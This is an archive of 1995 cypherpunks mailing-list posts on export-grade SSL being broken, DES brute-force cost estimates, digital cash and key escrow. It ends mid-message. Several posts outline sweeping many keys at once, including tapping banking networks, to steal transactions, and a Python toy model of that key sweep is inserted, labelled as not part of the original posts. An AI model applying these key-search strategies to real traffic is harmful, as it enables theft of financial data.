For some time now, Adam Back has been offering to sell RSA T-shirts for
cyberbucks (DigiCash's experimental anonymous digital cash system), but
no-one has had enough available to take him up on it. However, thanks to
the success of the ecm mailing list (ecm@ai.mit.edu) and WWW site
(http://www.c2.org/~mark/ecash/ecash.html), today I finally managed to 
collect enough c$ to buy one.

It was something of a feat to gather that many c$ in one place, as
the number of sellers is limited. There are many more buyers than
sellers, everyone wants c$, but few people are selling at a realistic
price. As it stands, we have managed to take a worthless currency (c$
are not backed with anything) and give it value based solely on what the 
market is willing to pay for it, due to its security, anonymity and ease 
of use advantages compared to the other digital payment systems on the 
Net. Once a DigiCash licensee starts offering to sell (and buy) ecash 
via VISA/MasterCard and chequing account, I could see ecash getting very
popular very quickly.

Using ecash once you've got the c$ in your ewallet/DigiCash bank
account is near instant. If used through the WWW forms interface as 
provided by the Windows and X-windows user interface, the transaction 
is as easy as clicking on a button. Instant buy, much more convenient 
than filling in credit card forms, talking to people on the phone, 
sending things in snail mail, etc, and anonymous too. Now you can 
even use the beta-test currency to buy and sell physical goods as well.

Anyway, if anyone knows of an earlier transaction of cyberbucks for physical 
goods than this (at 15:00 GMT 17th August 1995), then please let me know. 
Also, if you have c$ that you wish to sell, or have run out and want to buy 
some more, come along and join in the fun on the WWW site or mailing list...

	Mark

P.S. If anyone in the UK wants to buy a rusty but reliable FIAT X1/9
convertible, it's yours for only 5,000 cyberbucks...

(For the record, I have no connection to DigiCash other than as an ecash
 beta tester, and the ecash market is not supported by them in any way.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Thu, 17 Aug 95 15:34:24 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508172234.SAA21241@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




John Pettitt <jpp@software.net> writes:
>On Wed, 16 Aug 1995, Damien Doligez wrote:
>>   The exportable SSL protocol is supposed to be weak enough to be
>>   easily broken by governments, yet strong enough to resist the attempts
>>   of amateurs.
>
>Exactly.
>
>>               It fails on the second count.  Don't trust your credit
>>   card number to this protocol.
>
>Huh?  So you run on 120 workstations worth how much?  to steal a credit
>card number worth how much?  Get real - there are hundreds of ways
>to get credit card numbers that cost less.  ...

SSL can of course be used to protect information other than credit card #s.
It is supposed to be strong enough to resist the attempts of amateurs, yet
it was broken not by a government, not by a three letter agency, not by a
major corporation, but by a grad student with a lot of spare cycles.

In other words, it was broken by an amateur.  The real issue is not cc#s,
the real issue is: does it do what it was designed to do (foil amateur
attempts), and the answer is: no, not so long as it is export-restricted
to only 40 secret bits of key.

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 17 Aug 95 15:36:43 PDT
To: Darrell Perko <dperko@efn.org>
Subject: Re: I need an exportable crypto algorithm.
In-Reply-To: <Pine.SUN.3.91.950817151721.6913A-100000@haus.efn.org>
Message-ID: <199508172235.SAA00248@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Darrell Perko writes:
> 	I realize that bad crypto is offensive to some here but I am in 
> desperate need of an exportable, public-domain, general-purpose crypto
> algorithm.  Or at least the rules for creating such.

Make it so weak as to be useless. Of course, you don't need it if it's
that weak.

> 	Sorry to bother y'all with this, but I am in dire straits.

Why not just get a decent algorithm abroad? Why would you want to
export a useless one?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 17 Aug 95 10:51:13 PDT
To: Marcel van der Peijl <bigmac@digicash.com>
Subject: Re: First known purchase of physical goods with cyberbucks
In-Reply-To: <199508171742.TAA15830@digicash.com>
Message-ID: <Pine.3.89.9508171820.A1363-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 17 Aug 1995, Marcel van der Peijl wrote:

> As far as I know, the first transaction took place when I (while
> testing) bought a postcard from GlobalX, the first ecash store to
> open besides our own (and mine).

Oh pooh ;-)..

> Maybe you should restrict the 'first known' claim to 'first known 
> purchase of physical goods with cyberbucks traded at the ECM'.

Hee.. Ok.. "first known purchase of physical goods with cyberbucks traded 
at the ECM" it is 8-)..

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jordan@Heuristicrat.COM (Jordan Hayes)
Date: Thu, 17 Aug 95 18:55:15 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <9508180154.AA02120@euclid.Heuristicrat.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From pierre@shell.portal.com Thu Aug 17 18:29:41 1995

	Unfortunately, in this case, insecure credit cards are not an
	obstacle to banks making money, so why should they care?

At the risk of sounding like Perry, if you think that the major card
issuers "don't care" about cutting (or eliminating) fraud, you're not
talking to the right people.  Fraud eats away a big chunk of revenue
and can quite significantly affect competitiveness in a market with
thin margins.

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 11:13:19 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Breaking DES anyone? (was: Breaking RC4-40 for less)
Message-ID: <8875.9508171811@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Fred Cohen <fc@all.net> wrote on cpunks:
> Since messages sent with netscape are fairly standard for the first
> so many bytes, why not make a 2^30 element table, store it on a few
> gigabytes of disk space, use a hash table on the message, and find
> the keys to one in every 1,000 messages about 1 time per second.  If
> this code is being used to send millions of credit transactions per
> day, we should be able decode thousands of credit card numbers per
> day for a one-time cost of about $5,00.

Nice idea and one which works for pure RC4, but unfortunately not for
128 bit, 88 bit known + 40 bit unknown "export" SSL.

Netscape's SSL uses "40 bit keys" that are composed in a strange way:
you are given 88 bits of known key, and this is combined with the 40
bit key, to give a 128 bit key.  That key is used to do the
encryption.  The problem is that this has a unix password salt like
effect, only this time there are 88 bits of salt rather than 12 bits.
So this means that you can't precompute anything on the 40 bits as the
88 bits are randomly generated, and likely vary with each session.

> The $10,000 estimate of the cost of computing time is far too high
> for a production-based attack on the netscape codes.

Agreed, it's too high for the other reason that lots of people have
spare compute cycles.  Idle cycles have low to non-existent
incremental cost, and there are plenty of them around in the world.

Back to breaking crypto systems.

There are a couple of things you can do, there is your pre-compute
some proportion of the key space - so that you get some of them, this
would work well for straight 40 bit RC4 - and there are quite probably
such products around - microsoft has a number of "secure" [sic] things
around the Microsoft Access we were looking at earlier, another system
for doing remote access (modem) and having the sessions encrypted.

The problem with micro$oft is they are a darn closed system, and
no-one so far has invested the time to decode what they're doing with
a debugger.  That was the reason for the failed brute RC4 a while back
- no specs.

So precompute regions of keys would work on pure RC4-40 as you
describe.  It would be fast too - a disk seek time being the bounding
factor - per key!

Another approach is to do lots of keys simultaneously - so you set up
this distributed effort which is continually re-sweeping the 40 bit
keyspace, say every couple of days or whatever.  You can sweep for
more than one key at once at very low incremental cost, an extra key
costs close to nothing.  So say you are searching for 1000 keys at
once - a dragnet approach - well keys just pop out at random as they
are hit, maybe straight away maybe at worst case the sweeping
roll-over time, but on average a key will fall out every 3 minutes.

The same approach is applicable to 1 guy with 1 humble PC, it'll sweep
the full keyspace in a year or two, but what does he care if he
gets a couple of keys a day, and they're all nice transactions he can
pilfer / make nefarious use of.

DES breaking schemes...

Something similar applies to DES, I mean what's a piffling 56 bit
keyspace if you don't really care *which* key of several thousand that
you actually want.  There are bound to be a large enough supply of DES
encrypted banking transactions flowing around the various financial
networks in the US to make a nefarious breaking of them eminently
possible.  It moves on the time for a complete sweep as you now have
56 bits to contend with - but I think with a team of say 1024
workstations like the one I am typing on (an SGI Indy ~$5k
workstation) in a distributed effort, and a large supply of DES keys,
you could get a workable break on *one* of those keys in a shortish
time how long?  Well I'm not sure how fast DES can be made to go for
these purposes, but 60k keys/sec is a figure I have for DES set_key
(Eric Young's code on a Sparc 20) I'm not too sure of the details of
what you'd need to brute a DES key, but setting up the key, and
presumably a small additional cost to test the first byte and every
256 tries to test 2 bytes etc.  Anyone know if 60k keys/sec sounds
reasonable for a DES brute?

Anyway working on that, 1024 workstations, 60k keys/sec = 60 M
keys/sec = 37 years!

But (here's the saving bit) if you try say 64k keys *at once* so
you've hoovered up a stack of keys (hypothetically - technically
plausible too a tap on a banking network should yield you a whole load
of them) *then* you can get much nicer figures:

A DES key every 5 hours!  I'm thinking 1024 workstation equivalents
shouldn't be insurmountable to organise - lots of people have faster /
multiprocessor machines, and farms of workstations / PCs etc.

Perhaps 64k keys is a bit generous, and 1024 keys would be a more
sensible figure, even then that translates to 13 days expected.

As someone said a while ago (breaking) Netscape is the big win!
Breaking DES is *the* big win!

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 17 Aug 95 16:20:31 PDT
To: kelly@netcom.com (Kelly Goen)
Subject: Re: Another SSL breakage...
In-Reply-To: <199508172217.PAA10756@netcom5.netcom.com>
Message-ID: <9508172319.AA07049@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> 
> where can the software be obtained I would like to run it on my dual pentium
> under solaris 2.4 for benchmarking...

A copy is on all.net's W3/gopher server
FRC


-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Thu, 17 Aug 95 12:33:37 PDT
Subject: Re: The Official Cypherpunks Screen Saver?
In-Reply-To: <ac58dab7120210048eb3@[205.199.118.202]>
Message-ID: <1995Aug17.193223.5667@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

>At 5:11 PM 8/17/95, Jim Gillogly wrote:

>>I would hazard a guess that 90% of the compute cycles in the world are used
>>running screen savers... this gives a <lot> of slack for people who would
>>like to harness them to perform productive work like making points about
>>the strength of security.

>Just a thought. The "Official Cypherpunks Screen Saver"? I'd rather have
>this running on my Mac than have a t-shirt.

What an incredibly cool idea.  Go for it...
-- 
Simmons' Law Of Alcoholic Expectations:
  The best stuff always happens after the meeting, when everyone goes to
  the bar.
Corollary: Any meeting which doesn't adjourn to the bar isn't worth going to.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Thu, 17 Aug 95 10:43:39 PDT
To: mark@unicorn.com
Subject: Re: First known purchase of physical goods with cyberbucks
Message-ID: <199508171742.TAA15830@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


> Anyway, if anyone knows of an earlier transaction of cyberbucks for physical 
> goods than this (at 15:00 GMT 17th August 1995), then please let me know. 

As far as I know, the first transaction took place when I (while
testing) bought a postcard from GlobalX, the first ecash store to
open besides our own (and mine). It is stored in the 'DigiCash
museum' next to early prototypes of all kinds of smartcards,
emulators, wallets etc.

This must have been around October last year (or August? Can't make
out the postmark). Hundreds of cards were shipped by several shops,
and stickers, lotteries, etc. Check the 'physical objects' section
on http://www.digicash.com/shops/categorical.html

Maybe you should restrict the 'first known' claim to 'first known 
purchase of physical goods with cyberbucks traded at the ECM'.

Sorry!

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// The hottest instruction on a P90? JMP $ @ 2.633A or 52C (with fan)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 17 Aug 95 17:01:32 PDT
To: Darrell Perko <dperko@efn.org>
Subject: Re: I need exportable crypto revisited.
In-Reply-To: <Pine.SUN.3.91.950817163344.7854B@haus.efn.org>
Message-ID: <199508180000.UAA00325@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Darrell Perko writes:
> 	Thank you all for your amazingly quick responses!  However, I
> should have noted in my original message that this encryption is to meet
> a contractual point for a commercial product to be delivered soon.  The
> product can have one and one only version to be boxed and shipped and
> will be sold internationally.  The encryption portion will be dynamically
> linked, so real encryption will be available on the net just not in the box.

If you have hooks for arbitrary encryption, you will find it to be
virtually impossible to export the product.

The only way to do this whole thing is to export the product to an
offshore development site without the crypto, have the crypto added,
and import the software into the US, never export it from the US. You
have no other real choice.

Welcome to hell. If you don't like it, complain to the NSA, and to the
Clinton administration, experts in being buggered by the NSA and
buggering us too.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Thu, 17 Aug 95 11:02:01 PDT
To: cypherpunks@toad.com
Subject: Re:  Idle compute cycles [Re: Netscape's Offical Response]
Message-ID: <9508171801.AA03537@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: Jim Gillogly <jim@acm.org>
>and one thing that seems to miss the point.

As usual, I agree with all Jim has to say, but there's another problem
with Netscape's response: they UNDERestimate the cost of breaking
RC4-128 (by brute force) by a factor of about 300 trillion.

If someone knows of a URL for Netscape's response, I'll be glad to
include a pointer in my virtual press conference.  I would have to ask
for permission before I put a copy on my disks.  Copyrights, you
know...

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 12:22:10 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Cost to Crack Keys
Message-ID: <9285.9508171921@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> >Hmm, I don't know about anyone else around here, but my workstation is
> >idle 99% of the time. I could almost certainly get access to all the spare
> >CPU cycles on 120 workstations for free, and I suspect that a lot of
> >people (particularly hackers) could do so as well. There's no need to
> >spend $ 10,000 on renting them.
> 
> But, Mark, estimates of the cost to crack a key _must_ be based on market
> prices, not on opportunistic access to machines. Such access is good for
> occasional, or one-shot, deals, but not for routine use.
> 
> For example, one doesn't say "Hey, I don't see how Hertz can charge $40 a
> day to rent a car...my friend lets me use his for free."
> [...]
> "Standard accounting practices" dictate the way to estimate production costs.

Agreed.

*But* the real cost to a particular organisation, is subsidised by the
amount of idle compute cycles they have.  You can't take this into
account very easily or accurately for a general figure, where raw $
are probably the best figure.

For instance I know someone who works for a large UK newspaper (he's
admin for their unix workstations), and he says there are acres of
RS6000s just sitting there idling most of the time.  They are used for
document preparation only (what a waste all that lovely silicon just
burning cycles, and being occasionally used as a glorified word
processor).

Anyway point being to that particular organisation, if they for some
reason (I dunno but say a big scoop - they need to nefariously break
something to get the low down on a politician - unofficially of
course), their real cost is quite a bit lower than the raw $, perhaps
0 cost even if they can wait long enough for their impromptu farm to
do the job.

This doesn't really affect the raw $ cost as such, people just need to
estimate the amount of wasted $ equivalent of idle compute they
already have in their personal calculations.

It would sound better if various newspapers would care to print
something along the lines of "with idle compute powers as many typical
organisations have in abundance".  Papers printing high sounding $
figures is though technically accurate (perhaps not too sure about the
accuracy), misleading to general public who probably don't realise
that there is a few $100 tho of idle compute lying around in the
accounts department already!

In summary, yes but it doesn't sound as good, and folks don't equate
idle CPU to $ intuitively.

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 20:41:33 PDT
To: cypherpunks@toad.com
Subject: Re: Non-News Govt Announcement on Key Escrow
Message-ID: <ac595a311502100481c2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:49 PM 8/17/95, Dave Banisar wrote:
>The White House and NIST announced today that they were planning to hold two
>open meetings next month to develop standards for "acceptable" software key
>escrow.  The standards will then be made into a FIPS. The programs cannot
>have keys larger than 64 bits.
>
>It's great to see that it only took them 18 months (since Feb. 94) to come
>up with a call for public meetings for something that nobody really wants
>anyway, except for the officials who plan to make it mandatory by slipping
>it through bit by bit and a couple of vendors.  (sorry, sarcasm mode
>off...)

One thing I'm hoping for is that Clinton will, as he contemplates his last
year and a bit in office, have an attack of "liberalism." That is, I am
hoping he realizes that any mandatory key escrow system is not only a
massive infringement on the right of people to speak and communicate as
they wish, it is also handing the keys to the Surveillance State to the
likes of Bob Dole, Jesse Helms, Alfonse D'Amato, Newt Gingrich, and William
Bennett.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 13:00:33 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re:  Breaking DES anyone? (was: Breaking RC4-40 for less)
Message-ID: <9403.9508171959@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Hal Finney <hfinney@shell.portal.com> writes on cpunks:
> > Another approach is to do lots of keys simultaneously - so you set up
> > this distributed effort which is continually re-sweeping the 40 bit
> > keyspace, say every couple of days or whatever.  You can sweep for
> > more than one key at once at very low incremental cost, an extra key
> > costs close to nothing.  So say you are searching for 1000 keys at
> > once [...] on average a key will fall out every 3 minutes.
> 
> I don't see how you can sweep for more than one key at once at low cost.
> Because of the salt, every possible SSL encrypted message has to be swept
> independently.  You can't sweep for two messages' keys at once because the
> input to the MD5 is different even for the same 40-bit key.

Agreed.  I was not being clear and mixing various things in one post.

I was talking about 3 different systems:

1) export SSL 88 + 40
2) pure RC4-40  (hypothetical - possible microsoft / other apps)
3) DES (56 bits, can it be done)

In the part you quote I was talking about pure RC4 40, I'm not sure
which applications fall into this category, but it is one thing we
have yet to determine.  Perhaps Microsoft Access falls in to this
category?  Other microsoft applications / other vendor applications?
someone needs to do the microsoft equivalent of a FOIA to extract this
info.  Anyone have any Microsoft software with encryption that they
could quiz Microsoft tech support about?

For export SSL it does not work for the reason you describe, the 88
bit salt effect.

For DES I think it does work (attacking many keys at once), but then
my understanding of DES is limited, but as a block cipher, presumably
you can just brute keys in a straight forward manner?  If so you can
try multiple keys at once, unless there is some salt effect involved
with typical CBC 56 bit DES operation too?  Depending on the relative
costs of the parts of the block cipher, 

a) key-setup
b) block / stream decrypt

pure RC4 is designed so that a) is vastly more expensive than b).

How does this pan out for DES?  DES (and RC4) are designed for fast
encrypt / decrypt, but is there an appreciable key setup phase?

I have these figures courtesy of Andy Brown:

> Using Eric Young's very fast libdes code, and using the supplied speed 
> test program I get the following output on a Sparc 20 (1 processor):
> 
>   Doing set_key for 10 seconds
>   582771 set_key's in 9.83 seconds
>   Doing des_ecb_encrypt's for 10 seconds
>   989184 des_ecb_encrypt's in 9.85 second
>   Doing des_cbc_encrypt on 8192 byte blocks for 10 seconds
>   982 des_cbc_encrypt's of 8192 byte blocks in 9.92 second
>   Doing crypt for 10 seconds
>   37101 crypts in 9.89 second
>   set_key       per sec =     59284.94 ( 16.9uS)
>   DES ecb bytes per sec =    803398.17 ( 10.0uS)
>   DES cbc bytes per sec =    810941.94 (  9.9uS)
>   crypt         per sec =      3751.37 (266.6uS)

So what is a brute DES program on multiple keys with CBC mode (is this
the most common mode?) going to look like in terms of calls to these
various calls?

The set_key looks slow compared to the DES cbc bytes per sec, even if
you have to cycle a couple of blocks to get to your known plaintext
location.  Am I on the right tracks?  It seems to me that you gain
considerably by doing multiple keys even with CBC and random IV due to
relatively fast block decrypt as compared to key setup.

> If digital cash in micro amounts became practical, people could be paid
> to let the "idle cycles" on their computers be used for this kind of
> highly parallel application.  (Some people have speculated that graphics
> rendering would be another suitable choice.)  It would be interesting to
> see what the market price of cycles became in such an environment.  That
> would give a better benchmark for the cost to break keys.

I think this would be an interesting way to determine the market value
of idle cycles, and likely lead to cheaper figures for breaking things
than are touted (by newspapers, and people to whose advantage it is to
estimate generously the cost).

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 21:06:30 PDT
To: Rich Salz <cypherpunks@toad.com
Subject: Re: Export policy change
Message-ID: <ac595f5c17021004b8a5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:48 AM 8/18/95, Rich Salz wrote:
>Just heard on the 11:30pm NPR news update.  The Clinton Administration
>has changed the crypto export policy.  You will now be allowed to
>export strong crypto, provided it is a key escrow system.  The
>reporter (Dan Charles?) said something like anyone can hold the keys,
>as long as they will be made avail when presented with a court order.
>He also said, US citizens will still be able to use strong crypto
>without key escrow internally.  Terrorists and drug pushers were given
>as "reasons."

And I want to formally announce "Tim's Sort of Good Escrow Service."

I accept keys, thus meeting Our Leader's dictum, but can't really say the
keys will be retrievable, as my floppies often get warped from sitting in
the sun.

Hey, if "anyone can hold the keys"....

Somehow I doubt this. I suspect that any mandatory GAK key escrow system
will involve all sorts of hoops which must be jumped through, all sorts of
approvals which must be gotten, etc.

My neighbor has agreed to be the escrow agent for my keys. He doesn't know
anything about computers, so he's taking my word that the things I give him
every couple of months are disks. He figures that if the Justice Department
ever asks for them, he'll point to the dusty box on the floor of his garage
and say, "There they be."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 13:15:26 PDT
To: hayden@krypton.mankato.msus.edu ("Robert A. Hayden")
Subject: Silly technical question from a non-technical person
Message-ID: <9453.9508172015@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> If it costs $10,000 to crack one 40-bit key (putting aside whether we 
> agree on that price or not), could not the software be designed in such a 
> manner that it is able to check, say, 10,000 keys at the same time?  Ie, 
> it computes a key, and then checks it against the array of data to see if 
> it fits any of them, and then goes on to the next one.

Hmm yes and no.

- For pure RC4-40 yes.

- For export SSL no.  It has what is effectively an 88 bit salt
  (familiar with unix password salts? like that only 88 bits).

- For full 128 bit SSL, yes, but 128 bits is rather large even if
  you have a few million keys to try at once with speed up gains.
  2^128 is a biiig number.

- For DES I think so, asked for others opinions, this might be the
  next one to die, big project but possibly doable with lots of keys
  at once

Adam
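
[Added example, not part of the original posts: a toy model of the point
made in this thread, that an unsalted keyspace can be swept once for many
sessions while a per-session salt (the 88 known bits) forces a separate
sweep per session. The 16-bit keyspace, the MD5-based check value and all
function names are assumptions chosen for illustration; the last function
reproduces the DES time figures quoted earlier in the thread.]

```python
import hashlib
import random

KEY_BITS = 16            # toy keyspace (assumption); the thread discusses 40 and 56 bits
KEYSPACE = 1 << KEY_BITS
SALT_BYTES = 11          # 88 bits, the known part of an export-SSL key


def check_value(secret, salt=b""):
    """Stand-in for 'set up the key, decrypt the known-plaintext block'."""
    return hashlib.md5(salt + secret.to_bytes(5, "big")).digest()[:8]


def make_targets(n, salted, seed=1995):
    """Constructed sample sessions: returns (secrets, [(salt, observed), ...])."""
    rng = random.Random(seed)
    secrets, sessions = [], []
    for _ in range(n):
        secret = rng.randrange(KEYSPACE)
        salt = bytes(rng.getrandbits(8) for _ in range(SALT_BYTES)) if salted else b""
        secrets.append(secret)
        sessions.append((salt, check_value(secret, salt)))
    return secrets, sessions


def sweep_shared(sessions):
    """Unsalted case: one key setup per candidate, then a table lookup
    that covers every session at once."""
    wanted = {}
    for idx, (_salt, observed) in enumerate(sessions):
        wanted.setdefault(observed, []).append(idx)
    found, setups = {}, 0
    for candidate in range(KEYSPACE):
        setups += 1
        for idx in wanted.get(check_value(candidate), ()):
            found[idx] = candidate
        if len(found) == len(sessions):
            break
    return found, setups


def sweep_salted(sessions):
    """Salted case: the candidate has to be re-derived under each
    session's own salt, so the work scales with the number of sessions."""
    found, setups = {}, 0
    for candidate in range(KEYSPACE):
        for idx, (salt, observed) in enumerate(sessions):
            if idx in found:
                continue
            setups += 1
            if check_value(candidate, salt) == observed:
                found[idx] = candidate
        if len(found) == len(sessions):
            break
    return found, setups


def seconds_per_recovered_key(key_bits, keys_per_sec, n_targets):
    """Full-sweep time divided by the number of keys swept for at once."""
    return (2 ** key_bits) / keys_per_sec / n_targets


if __name__ == "__main__":
    for salted in (False, True):
        secrets, sessions = make_targets(8, salted)
        found, setups = (sweep_salted if salted else sweep_shared)(sessions)
        assert [found[i] for i in range(8)] == secrets
        print("salted" if salted else "unsalted", "key setups:", setups)
    rate = 1024 * 60_000   # the post's 1024 workstations at 60k keys/sec
    print("DES, 1 key   :", seconds_per_recovered_key(56, rate, 1) / 31_557_600, "years")
    print("DES, 64k keys:", seconds_per_recovered_key(56, rate, 65536) / 3600, "hours")
    print("DES, 1024 keys:", seconds_per_recovered_key(56, rate, 1024) / 86400, "days")
```
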





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Thu, 17 Aug 95 12:19:13 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: First known ... (stop this thread please)
Message-ID: <199508171918.VAA17926@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


> Also, there are other potential claims for this sort of thing. Based on
> varying extents to which the "electronic money" is really secure, is
> cryptographically interesting, etc.

Sorry, I think we should kill this thread while we're still on top of 
it. The discussion was CyberBucks, not electronic payments or 
anything like that. I _KNOW_ what the first transaction was, since I 
made it, I saw it at the bank, I received the goods, and got an email 
from the sender saying it was the first transaction.

I do not wish to take claim for any of that other stuff, whether it
is Chaumian or not. No doubt somebody traded some baseball cards for
a few bits somewhere back in the fifties. Let's not dig up any other
dead bodies. My claim (which was only to show the incorrectness of
the other) is a very restrictive one, and is only for the CyberBucks
trading.

// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// The hottest instruction on a P90? JMP $ @ 2.633A or 52C (with fan)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: quazi@banyan.com (Quazi)
Date: Thu, 17 Aug 95 14:19:51 PDT
To: cypherpunks@toad.com
Subject: WANTED: anonymous remailer source code
Message-ID: <199508172119.RAA04589@newsstand.cit.cornell.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hi All.

I'm interested in porting some remailer code to work on NT (most
likely using NTMail as the smtp service). I'd like to be sure I'm
starting my port from the most recent revisions, and the sources at
the archive at berkeley seem a bit dated. Are they the latest sources?
Are there more recent sources available somewhere?

Thanks,
Quazi






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 17 Aug 95 18:29:32 PDT
To: jim@acm.org
Subject: Re: I need exportable crypto revisited.
In-Reply-To: <199508180030.RAA04988@mycroft.rand.org>
Message-ID: <9508180128.AA11668@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> 
> > "Perry E. Metzger" <perry@piermont.com> writes:
> > If you have hooks for arbitrary encryption, you will find it to be
> > virtually impossible to export the product.

...

> Has anybody who's been impaled on the stinky end of this stick been told the
> chapter and verse?

I had the experience about 5 years ago - it's not really a big deal.

I submitted a product (Integrity Toolkit - still detecting and limiting
the spread of all current viruses after 5+ years of not being updated)
for release in source form to my European distributors (who are now the
sole global source - I got out of that business).  In order to assure
that it could detect alteration (as part of its integrity shell), it
used a pretty strong cryptographic checksum - actually a message digest
that's faster than MD5 on a PC architecture, combined with an RSA system
I implemented in MuLisp (pretty fast long arithmetic for a high-level
language implementation).

To add fuel to the fire, the system came with an encryption capability
that included the ability to use an external encryption scheme of the
user's own design.  It even included source for a simplistic encryption
program that could be replaced with real encryption by simply adding the
code for the real encryption into the C source provided, recompiling,
and running.

I submitted it to state who sent it to the NSA who called me a few
